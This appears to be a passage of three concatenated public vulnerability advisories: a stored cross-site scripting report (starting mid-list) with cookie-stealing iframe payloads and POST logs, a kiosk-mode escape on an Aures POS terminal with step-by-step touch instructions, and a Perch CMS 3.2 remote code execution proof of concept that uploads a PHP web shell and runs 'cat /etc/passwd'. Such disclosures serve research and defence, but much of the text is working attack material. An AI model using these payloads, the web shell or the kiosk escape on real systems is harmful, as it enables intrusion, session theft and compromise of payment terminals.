3. 
Inject to the marked vulnerable input fields your test payload 4. Save the entry by submit via post method 5. Login to the account and preview the settings Note: Administrators in the backend have the same wrong validated context that executes on preview of users 6. The script code executes on preview of the profile - settings 7. Successful reproduce of the first vulnerability! 8. Followup by opening the Delivery address module 9. Add a contact and add in the same vulnerable marked input fields your test payload Note: T he script code executes on each review of the address in the backend or user frontend 10. Successful reproduce of the second vulnerability! Exploitation: Payload "<iframe src=evil.source onload(alert(document.cookie)> "<iframe src=evil.source onload(alert(document.domain)> --- PoC Session Logs (POST) --- https://paulprinting.localhost:8000/printing/account/setting Host: paulprinting.localhost:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 357 Origin:https://paulprinting.localhost:8000 Connection: keep-alive Referer:https://paulprinting.localhost:8000/printing/account/setting Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd; POST: title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>> &lastname=b"<iframe src=evil.source onload(alert(document.cookie)>> &address=c"<iframe src=evil.source onload(alert(document.cookie)>> &city=d"<iframe src=evil.source onload(alert(document.cookie)>> &state=e"<iframe src=evil.source onload(alert(document.cookie)>> &zipcode=2342&country=BS&phone=23523515235235&save=Save - POST: HTTP/3.0 302 Found content-type: text/html; charset=UTF-8 x-powered-by: PHP/7.1.33 location:https://paulprinting.localhost:8000/printing/account/setting?save=1 - https://paulprinting.localhost:8000/printing/account/setting?save=1 Host: paulprinting.localhost:8000 Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer:https://paulprinting.localhost:8000/printing/account/setting Connection: keep-alive Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd; - POST: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 x-powered-by: PHP/7.1.33 Vulnerable Source: Your Account - Settings <div class="form-group row"> <label class="col-sm-4 col-form-label">First name</label> <div class="col-sm-8"> <input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <label class="col-sm-4 col-form-label">Last name</label> <div class="col-sm-8"> <input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <div class="form-group row"> <label class="col-sm-4 col-form-label">Address</label> <div class="col-sm-8"> <input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <div class="form-group row"> <label class="col-sm-4 col-form-label">City</label> <div class="col-sm-8"> <input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <div class="form-group row"> <label class="col-sm-4 col-form-label">State</label> <div class="col-sm-8"> <input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> Vulnerable Source: Deliery Contact (Address) <table class="table"> <thead> <tr> <th>Contact</th> <th>Address</th> <th>City</th> <th>State</th> <th>Country</th> <th></th> </tr> </thead> <tbody><tr> <td>a"<iframe src=evil.source onload(alert(document.cookie)></td> <td>b"<iframe src=evil.source onload(alert(document.cookie)></td> <td>c"<iframe src=evil.source onload(alert(document.cookie)></td> <td>d"<iframe src=evil.source 
onload(alert(document.cookie)></td> <td></td> <td class="text-right"> <a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>| <a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1" onclick="return confirm('Delete')">Delete</a> </td></tr></tbody> </table> Security Risk: ============== The security risk of the cross site scripting web vulnerabilities with persistent attack vector are estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Aures Booking & POS Terminal - Local Privilege Escalation
Exploit Title: Aures Booking & POS Terminal - Local Privilege Escalation References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2323 Release Date: ============= 2023-07-17 Vulnerability Laboratory ID (VL-ID): ==================================== 2323 Common Vulnerability Scoring System: ==================================== 7.2 Vulnerability Class: ==================== Privilege Escalation Current Estimated Price: ======================== 3.000€ - 4.000€ Product & Service Introduction: =============================== KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner. With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to manage customer cards and promotions. Queue management can also be optimized. (Copy of the Homepage:https://aures.com/de/komet/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. 
Affected Product(s): ==================== Aures Technologies GmbH Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise) Vulnerability Disclosure Timeline: ================================== 2023-05-09: Researcher Notification & Coordination (Security Researcher) 2023-07-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Local Severity Level: =============== High Authentication Type: ==================== Open Authentication (Anonymous Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers to bypass the kiosk mode to compromise the local file system and applications. It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local privileged access to the booking service front display are able to execute files, can download content without restriction or exfiltrate local file-system information of the compromised windows based operating system. No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system vulnerability requires no user interaction to become exploited and can only be triggered by local physical device access. 
Vulnerable Operating System(s): [+] Windows 10 (IoT Enterprise) Affected Component(s): [+] Context Menu Affected Function(s): [+] Web Search [+] Share (Teilen) Proof of Concept (PoC): ======================= The local vulnerability can be exploited by local attackers with physical device access without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Sheet Touch Display => Select Food Item => Highlight Text => Open Context Menu => Extend Context Menu => Web-Search => Browser => Local File System => Compromised! Manual steps to reproduce the vulnerability ... 01. First touch the monitor display to move on from standby 02. Select a food item from the menu of immergrün (we recommend the cesar wraps) 03. Push the information button of the selected food item 04. Push twice via touch to mark the selected food item text 05. Press a third time after you have marked the context by holding it down on the touch display 06. Now the function context menu of the operating system for highlighted text appears 07. In the context menu, 3 dots appear to extend the visible function menu 08. Select the web-search or share function for the highlighted content in the context menu 09. 
The browser of the operating system opens on the main front screen 10.1 By now you are able to download and execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files) 10.2 Attackers can open websites on the front display to manipulate the visible content (Scam & Spam - Web Messages & Web Context) 10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Form & Banking Information) 10.4 Attackers are able to access the local file system and compromise it by reconfiguration with a privileged user account (Local File-System - Privilege Escalation) 10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.) 10.6 Attackers are able to exfiltrate data from the local computer system using web connections and available protocols 10.7 Attackers are able to perform man in the middle attacks from the local computer system 11.0 Successful reproduction of the security vulnerability! Reference(s): Pictures - 1.png (Terminal A) - 2.png (Terminal B) - 3.png (Escape) - 4.png (Awareness) Solution - Fix & Patch: ======================= The security vulnerabilities can be patched by following these steps: 1. Disable the context menu extension 2. Disable the context menu 3. Disable web-search 4. Disable marking of text inputs & texts 5. Disallow opening of non-whitelisted websites 6. Disable file downloads 7. Restrict the web-browser access 8. Disallow the file browser 9. Disable the browser debug mode 10. Reconfigure the local firewall to allow and disallow connections 11. Change the access permissions to prevent exfiltration Security Risk: ============== The security risk of the vulnerability in the local booking and payment terminal system is considered high. The issue can be easily exploited by local attackers with simple interaction via the touch display. 
Once compromised, the attackers can fully manipulate the computer's operating system and misuse it for further simple or more complex attack scenarios. Credits & Authors: ================== Benjamin Mejri (Kunz) -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Lars Guenther -https://www.vulnerability-lab.com/show.php?user=L.+Guenther
Perch v3.2 - Remote Code Execution (RCE)
Exploit Title: Perch v3.2 - Remote Code Execution (RCE) Application: Perch CMS Version: v3.2 Bugs: Authenticated RCE via unrestricted file upload Technology: PHP Vendor URL: https://grabaperch.com/ Software Link: https://grabaperch.com/download Date found: 21.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== Steps: 1. Log in to an account with admin privileges (the asset upload form is only reachable after authentication, so this is an authenticated/post-auth RCE) 2. Visit the assets page (http://localhost/perch_v3.2/perch/core/apps/assets/) 3. Add an asset (http://localhost/perch_v3.2/perch/core/apps/assets/edit/) 4. Upload a file named poc.phar; the asset upload accepts it even though it contains PHP code. poc.phar file contents: <?php $a=$_GET['code']; echo system($a);?> 5. Visit http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd — the uploaded file is stored under the web root (resources/admin/) and is executed because the server's PHP handler also maps the .phar extension to the interpreter (commonly the case in default Apache/PHP setups). If .phar is not mapped to PHP on the target, the file is served as a download and this path does not yield code execution; the root cause remains the missing extension/content validation on asset upload, which should be fixed server-side with an allow-list of safe extensions and by storing uploads outside the executable web root. PoC request: POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1 Host: localhost Content-Length: 1071 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9 Connection: close ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="resourceTitle" test ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="image"; filename="poc.phar" Content-Type: application/octet-stream <?php $a=$_GET['code']; echo system($a);?> ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="image_field" 1 
------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="image_assetID" ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="resourceBucket" admin ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="tags" test ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="btnsubmit" Submit ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="formaction" edit ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="token" 5494af3e8dbe5ac399ca7f12219cfe82 ------WebKitFormBoundaryYGoerZn09hHSjd4Z--